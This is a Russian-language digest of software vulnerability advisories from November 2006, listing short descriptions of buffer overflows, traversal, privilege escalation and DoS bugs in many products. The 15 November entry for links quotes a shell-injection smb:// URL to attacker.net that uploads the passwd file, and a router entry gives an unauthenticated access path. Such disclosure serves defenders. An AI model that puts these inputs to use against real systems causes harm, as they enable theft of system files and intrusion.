30 ноября 2006 г. Подробнее

7! Многочисленные ошибки в Mac OS X (multiple bugs)   Переполнение буфера в PPP. Обнаружение пользовательских учетных записей через ftpd. Переполннение буфера в Type Services server. Повреждение памяти через файлы .DS_Store в Finder. Обращение к освобожденным объектам в WebKit.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

29 ноября 2006 г. Подробнее

6! Переполнение буфера в библиотеке Borland idsql32.dll (buffer overflow)   Переполнение буфера в функции DbiQExec().   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

28 ноября 2006 г. Подробнее

9! Переполнение буфера в ProFTPD (buffer overflow) дополнено с 10 ноября 2006 г.   Однобайтовое переполнение буфера в sreplace() используется для получения удаленного привилегированного доступа. 6! Ошибка форматной строки в GNU Radius (format string)   Ошибка форматной строки в sqllog() при журналировании через SQL.   Обратный путь в каталогах класса DeploymentFileRepository JBoss Web Server (directory traversal)   Функция setBaseDir() класса DeploymentFileRepository не проверяет, чтобы каталог был установлен внутри рабочего каталога.

Переполнение буфера в GnuPG (buffer overflow)   Переполнение буфера на длинном имени файла.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Обратный путь в каталогах tar (directory traversal)   Проблемы при разборе устаревшей структуры GNUTYPE_NAMES позволяют создать символьные линки, ведущие за пределы директории назначения.

Слабые разрешения в текстовых редакторах KDE Kate / Kwrite / Kile (weak permissions) дополнено с 19 июля 2005 г.   Резервные файлы создаются со слабыми разрешениями.

27 ноября 2006 г. Подробнее

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.   DoS против QBIK Windate   Бесконечный цикл при разборе сжатых DNS-запросов.   Переполнение буфера в TFTP-Серверах AT-TFTP / 3CTftpSvc (buffer overflow)   Переполнение буфера в командах GET, PUT.

Выполнение кода через pstotext (shell characters)   Проблема шел-символов через имя обрабатываемого файла.

25 ноября 2006 г. Подробнее

Внедрение shell-символов в fvwm-menu-directory (shell characters)   Возможно внедрение шел-символов через имена просматриваемых каталогов.   DoS против mod_auth_kerberos в Apache   Однобайтовое переполнение в der_get_oid().   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

23 ноября 2006 г. Подробнее

7! Переполнение буфера Windows Media Player (buffer overflow)   Переполнение стека при разборе файлов .asx.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.   Перехват учетных данных в менеджере паролей Firefox (information leak)   При автоматическом заполнении формы не учитывается ее назначение, поэтому, если атакующий может вставить форму в содержимое сайта, то он сможет получить результаты сохраненных полей (логин/пароль).

22 ноября 2006 г. Подробнее

6! Переполнения буфера в XMPlay (buffer overflow)   Переполнения буфера при разборе файлов .ASX и .M3U. 6! Переполнение буфера в CA BrightStor ARCserve Backup (buffer overflow)   Переполнение буфера при разборе данных TCP/6502.   Слабые разрешения в PassGo SSO Plus (weak permissions)   Слабые разрешения на папку установки.

Обход криптографической защиты в клиенте VMWare VirtualClient (weak cryptography)   Не проверяется сертификат сервера при подключении по SSL.

Повышение привилегий через My Firewall Plus (privilege escalation)   Происходит запуск Explorer.exe с привилегиями локальной системы.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

20 ноября 2006 г. Подробнее

7! Переполнение буфера в службе рабочей станции Microsoft Windows (buffer overflow) дополнено с 14 ноября 2006 г.   Переполнение буфера в службе, основанной на RPC.   Однобайтовое переполнение буфера в сервере IMAP/POP3 Dovecot (buffer overflow)         Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

18 ноября 2006 г. Подробнее

7! Переполнение буфера в драйвере NetGear WG111 (buffer overflow)   Переполнение буфера при разборе Beacon-фрейма. 6! DoS против libpng дополнено с 16 ноября 2006 г.   Чтение за пределами выделенной памяти в png_set_sPLT().   Выход за пределы ограниченной среды в Sun Java (protection bypass)   Функции библиотеки Swing могут обратиться к данным других апплетов.

Повышение привилегий через драйвер HIPS в продуктах Computer Associates (privilege escalation)   Недостаточный контроль параметров перехваченных фуннкций TDI и NDIS.

Переполнение буфера в TFTP-сервере TFTPD32 (buffer overflow)   Переполнение буфера на длинном имени файла.

DoS против WBEM в HP-UX

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

17 ноября 2006 г. Подробнее

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

16 ноября 2006 г. Подробнее

6! Многочисленные уязвимости в ActiveX Panda Antivirus ActiveScan (multiple bugs)   Повреждение памяти, утечка информации, возможность перезагрузки компьютера пользователя.   DoS против UniversalFTP   Отказ сервера на команде MKD определенного формата.   Обратный путь в каталогах Selenium FTP Server / Conxint FTP (directory traversal)   Обратный путь в каталогах в различных командах.

Слабые разрешение в MDaemon (weak permissions)   Папка установки позволяет пользователям создание файлов, что позволяет подмены системных DLL локальными версиями.

Повышение привилегий через Kerio Webstar (privilege escalation)   Suid-приложение подгружает библиотеку из текущего каталога.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Многочисленные уязвимости в клиенте сетей Netware Microsoft Windows (multiple bugs) дополнено с 14 ноября 2006 г.   Повреждение памяти, DoS.

Повышение привилегий через Outpost Firewall (privilege escalation) дополнено с 2 ноября 2006 г.   Недостаточная проверка данных устройства \Device\SandBox и аргументов перехваченых системных вызовов SSDT.

15 ноября 2006 г. Подробнее

9! Переполнение буфера в daxctle.ocx и при разборе HTML Microsoft Windows (buffer overflow) дополнено с 13 сентября 2006 г.   Переполнение буфера динамической памяти в ActiveX объекте DirectAnimation.PathControl метод KeyFrame. переполнение буера в опции CSS Float. Может быть использовано для скрытой установки вредоносного кода. 6! Проблема шел-символов в links (shell characters)   Проблема шел-символов при вызове внешней команды smbclient при обработке URL типа 'smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '

14 ноября 2006 г. Подробнее

9! 0-day выполнение кода через XMLHTTP ActiveX в Windows (code execution) дополнено с 5 ноября 2006 г.   Уязвимость в ActiveX используется для скрытой установки вредоносного кода. 8! Переполнение буфера в Macromedia Flash Player (buffer overflow) дополнено с 13 сентября 2006 г.   Переполнение динамического буфера при показе .swf файлов. Может быть использована для скрытой установки вредоносного кода через браузер. 7! Переполнение буфера в беспроводных драйверах D-Link (buffer overflow)   Переполнение буфера при длинном поле Rates beacon-фрейма 802.11

6! Многочисленные уязвимости в PowerDNS (multiple bugs)   Переполнение буфера и DoS.

6! Многочисленные уязвимости в Citrix Metaframe (multiple bugs) дополнено с 9 ноября 2006 г.   DoS и переполнение буфера в сервисе IMA (TCP/2512, TCP/2513).

Утечка информации через SNMP в 3Com SuperStack 3 (information leak)   Возможно получить SNMP community с помощью определенных пакетов управления.

Криптографическая уязвимость ISAKMP в Novell BorderManager (weak cryptography)   Слабый алгоритм генерации Cookie позволяет replay-атаки.

Переполнение буфера в GraphicsMagick (buffer overflow)   Переполнения буфера при разборе форматов PALM и DCM.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Многочисленные уязвимости в VMWare ESX Server (multiple bugs)   Некорректная работа с командами fxsave/restore на процессорах AMD. Ошибки во включенном ПО.

Слабое шифрование в токенах Digipass Go3 (weak encryption)   Используется ослабленная реализация алгоритма 3DES.

13 ноября 2006 г. Подробнее

7! Переполнение буфера в беспроводных драйверах Broadcom (buffer overflow)   Переполнение буфера на длинном SSID. 6! Многочисленные уязвимости в антивирусе AVG (multiple bugs)   Переполнения динамической памяти при разборе архивов CAB и RAR, целочисленное переполнение при разборе EXE.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

11 ноября 2006 г. Подробнее

DoS через fpathfconf() в Mac OS X   Вызов fpathconf() для неподдерживаемого типа файлов приводит к краху системы.   Повышение привилегий в Avahi (privilege escalation)   Недостаточная проверка сообщений Netlink дает локальному пользователю возможность манипуляции параметрами сервера.   DoS против OpenLDAP   Определенные параметры bind-запроса приводят к отказу сервера.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

10 ноября 2006 г. Подробнее

6! Выполнение кода через HP OpenView Client Configuration Manager (code execution) дополнено с 9 ноября 2006 г.   Через порт TCP/3465 возможно дать команду на загрузку и выполнение файла без аутентификации.   Обратный путь в каталогах MailMarshal (directory traversal)   Обратный путь в каталогах при разборе архивов ARJ.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Обход защиты в Netkit FTP Server (protection bypass)   Некорректное использование seteuid() и chroot() позволяют в определенных конфигурациях выход за пределы корневого каталога сервера.

Переполнение буфера в библиотеке libpthread под HP Tru64 Unix (buffer overflow)   Переполнение буфера при разборе переменной окружения PTHREAD_CONFIG.

9 ноября 2006 г. Подробнее

6! Многочисленные уязвимости в Cisco Secure Desktop (multiple bugs)   Слабые разрешения NTFS на папку установки. Обход защиты. Утечка информации.   Переполнение буфера в GNU gv (buffer overflow)   Переполнение буфера стековой памяти на длинных комментариях в файлах PostScript.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

DoS против библиотеки libarchive   Конец архива, полученный в момент пропуска области приводит к вечному циклу.

8 ноября 2006 г. Подробнее

8! Многочисленные уязвимости в Mozilla Firefox / Thunderbird / Seamonkey (multiple bugs)   Повреждения памяти, подмена кода, выполнение кода. Могут быть использованы для скрытой установки вредоносного кода. 6! Обход фильтрации IPv6 ядра Linux (protection bypass)   Возможно обойти фильтрацию, используя фрагментированные пакеты. 6! Утечка информации в Lotus Notes (information leak)   Через порт TCP/1352 возможно проверить существование пользователя и для нового пользователя загрузить его сертификат.

6! Повышение привилегий через Xcode OpenBase SQL в Apple MacOS X (privilege escalation) дополнено с 16 октября 2006 г.   При вызове tar из suid root приложения не сбрасывается переменная окружения TAR_OPTIONS, что позволяет выполнить любоеприложения с привилегиями root. Внешние приложения вызываются по относительному пути. Динамические библиотеки подгружаются по относительному пути. Проблема символьных линков.

Переполнение буфера в NFS-сервере OmniNFS (buffer overflow)

Переполнения буфера в tunekrnl Lotus Domino (buffer overflow)   Многочисленные переполнения буфера в suid-утилите.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

7 ноября 2006 г. Подробнее

6! Ошибка форматной строки в WarFTPd (format string)   Ошибка форматной строки в команде CWD. 6! Переполнение буфера в WFTPD Pro (buffer overflow)   Переполнение буфера команде APPE.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

6 ноября 2006 г. Подробнее

10! Выполнение кода через ICQ (code execution)   Небезопасная функция элемента управления ICQPhone.SipxPhoneManager позволяет загрузить и выполнить код через сообщение ICQ или Web-страницу. 6! Повышение привилегий через структуры GDI ядра Windows (privilege escalation)   Разделяемую секцию памяти, отображенную в режиме только чтения, возможно отобразить в режиме записи.   Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

5 ноября 2006 г. Подробнее

7! Криптографические уязвимости в OpenSSL (weak cryptography) дополнено с 5 сентября 2006 г.   При использовании ключа RSA с экспонентой 3 в формате PKCS #1 v1.5 можно подделать подпись этого ключа. 6! Многочисленные уязвимости в imlib (multiple bugs)   Многочисленные уязвимости при разборе форматов ARGB, JPG, LBM, PNG, PNM, TGA и TIFF. 6! Переполненеи буфера в Novell NetMail (buffer overflow)   Переполнение буфера при разборе имени пользователя, содержащем точку.

DoS против XM Easy Personal FTP Server   Отказ на длинном аргументе команды NLST -al.

Переполнение буфера в Essentia Web Server (buffer overflow)   Переполнение буфера на длинном GET-запросе.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Проблема символьных линков в thttpd (symbolic links)   Небезопасное создание временных файлов при ротации лог-файлов.

3 ноября 2006 г. Подробнее

8! Переполнение буфера в функциях PHP (buffer overflow)   Переполнения буфера в функциях htmlentities() и htmlspecialchars() при использовании UTF-8.   Двойной free() в модуле squashfs ядра Linux         Многочисленные ошибки в HP System Management Homepage (multiple bugs)   Межсайтовый скриптинг, обход защиты.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Переполнение буфера в клиенте iodine (buffer overflow)   Переполнение буфера при разборе ответа cервера DNS.

Проблема шел-символов в ingo1 (shell characters)   Недостаточная фильтрация шел-символов при создании правил procmail дает возможность выполнения кода.

Обход защиты в pam_ldap (protection bypass)   Возможно войти в систему с отключенной учетной записью.

Переполнение буфера в графических драйверах Nvidia для Linux / Solaris (buffer overflow) дополнено с 19 октября 2006 г.   Целочисленное переполнение в _nv000053X приводит к переполнению буфера.

2 ноября 2006 г. Подробнее

7! Переполнение буфера в драйвере Apple Airport под Mac OS X (memory corruption)   Повреждение памяти при разборе фрейма probe response. 6! Многочисленные уязвимости в SAP Web Application Server (multiple bugs)   Локальное повышение привилегий через именованные каналы, обратный путь в каталогах, DoS.   Повышение привилегий в HP-UX (privilege escalation)

DoS против ядра Linux   Бесконечный цикл в /proc/net/ip6_flowlabel.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Многочисленные DoS-условия в wireshark   DoS-условия при разборе различных протоколов.

Обход аутентификации в Cisco Security Agent Management Center (authentication bypass)   При использовании LDAP для аутентификации возможен доступ с пустым паролем.

1 ноября 2006 г. Подробнее

Многочисленные уязвимости в Asterisk (multiple bugs)   Определенные последовательности пакетов приводят к отказу сервера.   DoS против Novell eDirectory   Крах службы при некорректном запросе на вход.   DoS против Novell iManager   Запрос HTTP POST с длинным параметром TREE приводит к ссылке по нулевому указателю.

Несанкционированный доступ к беспроводным маршрутизаторам B-FOCuS Wireless (unauthorized access)   С помощью URL типа http://target/html/defs/ можно получить доступ к служебной информации маршрутизатора.

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )   Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.

Несанкционированный доступ через ActiveX BlooMooWeb (unauthorized access)   Элемент управления содержит небезопасные функции.

Неизменяемый адрес DNS в беспроводных маршрутизаторах Hawking Technology WR254-CA   Используется неизменяемый адрес DNS 139.175.55.244.